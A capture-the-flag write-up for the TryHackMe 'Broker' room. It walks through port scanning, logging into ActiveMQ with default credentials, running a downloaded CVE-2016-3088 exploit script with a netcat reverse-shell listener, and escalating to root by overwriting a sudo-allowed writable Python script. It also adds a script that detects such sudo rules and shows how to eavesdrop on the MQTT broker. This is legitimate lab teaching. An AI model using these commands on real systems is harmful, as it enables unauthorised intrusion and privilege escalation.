Broker Writeup

TryHackMe: Broker, created by @M0N573R777 and @ripcurlz

The creators give us many hints in this room, starting with the room description, the notes and the flag hints.

Description

Paul and Max use a rather unconventional way to chat. They do not seem to know
that eavesdropping is possible though…

Task 2 Enumeration & flags
Paul and Max found a way to chat at work by using a certain kind of software.
They think they outsmarted their boss, but do not seem to know that eavesdropping
is quite possible…They better be careful…

Do a TCP portscan on all ports with port number greater than 1000 and smaller
than 10000! Which TCP ports do you find to be open? (counting up)

Hint: nmap -p1001-9999 IP

What is the name of the software they use?

Hint: running on one of the ports you found in question 1

Which videogame are Paul and Max talking about?
Use a MQTT client. Note: MQTT Explorer does not work. Also only use MQTT
version 3.1 as the protocol version.

flag.txt
CVE for the software you found in question 2

root.txt
/etc/sudoers

Another important hint is how TryHackMe classifies this room. Go to "All Rooms" and search for this specific room: it is classified as a message broker.

First, decide whether you want to add a host entry in /etc/hosts or use the room IP directly in each command. To keep this writeup simple I added the name broker.thm to my /etc/hosts.

echo "[Room IP]      broker.thm" | sudo tee -a /etc/hosts

Let's follow the basic hacker methodology.

In this room we will use the first three steps of the basic hacker methodology: recon, exploitation and privilege escalation.

Phase 1: recon

Start scanning for open ports and running services.

sudo nmap -sS -sV -T4 --open -Pn -p 1000-10000 broker.thm

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-11 07:43 EST
Nmap scan report for broker.thm (10.10.56.121)
Host is up (0.15s latency).
Not shown: 8999 closed ports
PORT     STATE SERVICE VERSION
1883/tcp open  mqtt?
8161/tcp open  http    Jetty 7.6.9.v20130131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.08 seconds

There are two open ports. Port 1883 is reported as mqtt? (the trailing question mark means nmap matched the port but could not confirm the service from its probes) and port 8161 runs Jetty. Searching the web: Jetty is a Java HTTP web server, and MQTT (Message Queuing Telemetry Transport) is a lightweight publish-subscribe messaging protocol, which fits the "message broker" classification of the room.

Opening the browser on port 8161.

Clicking on "Manage ActiveMQ broker" brings up an HTTP basic authentication prompt.

Phase 2: exploitation

Whenever you find a default page behind authentication, it is worth searching for default credentials before anything else. In this case the defaults are username admin, password admin, and they work here.

Apache ActiveMQ default administrative credentials

We are in the ActiveMQ admin page; the version is 5.9.0. Searching the Exploit Database, I found a Metasploit module for this service and version range, Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit), but unfortunately it does not work against this host.

Searching a little more, I found a page describing the Analysis of Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088), which explains how to exploit it.

That was the way in for me, and I recommend reading that page and learning every step needed to exploit the vulnerability.

After finishing the room I wrote a simple script that does the work automatically.

So, let’s do it.

wget https://raw.githubusercontent.com/cyberaguiar/CVE-2016-3088/main/exploit_activemq.py

Open a new terminal window and start a netcat listener.

nc -nvlp 1234

Running the script without arguments prints its usage.

python3 exploit_activemq.py
Developed by @cyberaguiar - www.cyberaguiar.com
-----------------------------------------------------------------------
** Disclaimer **
-----------------------------------------------------------------------
The developer of this script are not responsible for any misuse of this
exploit we only encourage the ethical use of this script and to be used
only when authorised to do so during an penetration test or similar. Any
damages or misuse of this script is the responsibility of the individuals
who use them unethically or with the intent to damage property.
-----------------------------------------------------------------------

USAGE: python exploit_activemq.py rhost rport username password lhost lport

Replace the local VPN IP in the command below with your own.

python3 exploit_activemq.py broker.thm 8161 admin admin 10.6.10.10 1234

Voilà, we have a shell.

Upgrade it to a proper bash shell with python3.

python3 -c "import pty;pty.spawn('/bin/bash')"; export TERM=xterm

Before continuing: there is a question in the room about the game Paul and Max were talking about. The room creators probably expect you to use an MQTT client and subscribe to the broker to read those messages. Since we went straight to the server this was not needed, but at the end of this writeup I will show how to do it.

ls -l

total 9968
-rw-r--r-- 1 activemq activemq    40580 Oct 14  2013 LICENSE
-rw-r--r-- 1 activemq activemq     3334 Oct 14  2013 NOTICE
-rw-r--r-- 1 activemq activemq     2610 Oct 14  2013 README.txt
-rwxr-xr-x 1 activemq activemq 10105484 Oct 14  2013 activemq-all-5.9.0.jar
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 bin
-rw-rw-r-- 1 activemq activemq     1443 Dec 25 17:50 chat.py
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 conf
drwxr-xr-x 1 activemq activemq     4096 Dec 26 04:45 data
-rw-r--r-- 1 activemq activemq       23 Dec 25 18:16 flag.txt
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 lib
-r-x------ 1 activemq activemq      143 Dec 25 17:50 start.sh
-rw-rw-r-- 1 activemq activemq      768 Dec 25 17:50 subscribe.py
drwxr-sr-x 5 activemq activemq     4096 Mar 11 12:39 tmp
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 webapps

Here is flag.txt. Also take a look at chat.py: it contains the messages Paul and Max exchange about the videogame.

Last step.

Phase 3: privilege elevation

sudo -l

Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py

ls -lha /opt/apache-activemq-5.9.0/subscribe.py

-rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 /opt/apache-activemq-5.9.0/subscribe.py

You can run the script above as root without a password, and you also have write access to the file, so sudo is effectively handing you root. Replace the content of the script so it executes bash as root (copy the original somewhere first if you want to restore it afterwards).

echo "import pty;pty.spawn('/bin/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py

root@activemq:/# cat /root/root.txt
ROOT_FLAG
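The check behind this escalation generalizes: any sudo rule that runs an interpreter on a script you can write is equivalent to a rule that runs your own code. The script below is an added example (not the room's subscribe.py and not part of the original writeup) that parses the command section of `sudo -l` output and reports rules whose binary, or whose script argument when the binary is an interpreter, is writable by the current user. The sample output is constructed from the page's `sudo -l` listing plus one control rule (the systemctl line) that is not from the room; the INTERPRETERS list is an assumption you can extend.

```python
"""Spot sudo rules that run an interpreter on a file the current user can write (added example)."""
import os
import re
import shlex
import subprocess
import sys

# Assumption: binaries whose first non-option argument is a script executed with the
# rule's privileges. "python3.7 /path/script.py" is only as safe as script.py's permissions.
INTERPRETERS = ("python", "perl", "ruby", "bash", "sh", "node", "php", "lua")

# One rule line: "(runas) TAG: TAG: command args, command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample: the room's rule plus a control entry that is NOT from the room.
SAMPLE_SUDO_L = r"""Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
    (root) NOPASSWD: /usr/bin/systemctl restart activemq
"""


def parse_sudo_l(output):
    """Return (runas, tags, argv) for every command rule in `sudo -l` output."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True  # everything after this header is a rule line
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(", "):  # several commands may share one runas
            rules.append((m.group("runas"), tags, shlex.split(cmd)))
    return rules


def writable(path):
    """Real permission check used outside tests."""
    return os.access(path, os.W_OK)


def find_writable_targets(output, is_writable=writable):
    """Return (runas, tags, path) for each rule whose binary or script is writable."""
    findings = []
    for runas, tags, argv in parse_sudo_l(output):
        if not argv:
            continue
        candidates = [argv[0]]  # a writable binary is the obvious case
        if os.path.basename(argv[0]).startswith(INTERPRETERS):
            # the interpreter is fine; its script arguments are what get executed
            candidates += [a for a in argv[1:] if not a.startswith("-")]
        for path in candidates:
            if is_writable(path):
                findings.append((runas, tags, path))
    return findings


if __name__ == "__main__":
    # -n: never prompt; fails cleanly if a password would be required.
    text = sys.stdin.read() if not sys.stdin.isatty() else subprocess.run(
        ["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for runas, tags, path in find_writable_targets(text):
        print("writable target in sudo rule (%s, %s): %s" % (runas, " ".join(tags), path))
```

Pipe `sudo -l` into it on the target, or run it directly; on the room box it reports subscribe.py because the file is owner- and group-writable by activemq while the rule runs it as root.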

Optional step, read the messages from ActiveMQ using a MQTT client

Download this mqtt client

git clone https://github.com/bapowell/python-mqtt-client-shell

Cloning into 'python-mqtt-client-shell'...
remote: Enumerating objects: 111, done.
remote: Total 111 (delta 0), reused 0 (delta 0), pack-reused 111
Receiving objects: 100% (111/111), 35.95 KiB | 624.00 KiB/s, done.
Resolving deltas: 100% (65/65), done.
cd python-mqtt-client-shell

python3 mqtt_client_shell.py

Welcome to the MQTT client shell.
Type help or ? to list commands.
Pressing <Enter> on an empty line will repeat the last command.

Client args: client_id=paho-6315-kali, clean_session=True, protocol=4 (MQTTv3.1.1), transport=tcp
Logging: on (indent=30), Recording: off, Pacing: 0
> python-mqtt-client-shell

Now execute the commands below.

protocol 3
connection
host broker.thm
connect
subscribe #

Done. You are now connected and the messages will start rolling in. The wildcard # subscribes to every topic, which is exactly why an unauthenticated broker is an eavesdropping problem: nothing stops a third client from joining Paul and Max's chat.

That is it, guys and girls, we're done.

See ya in the next challenge.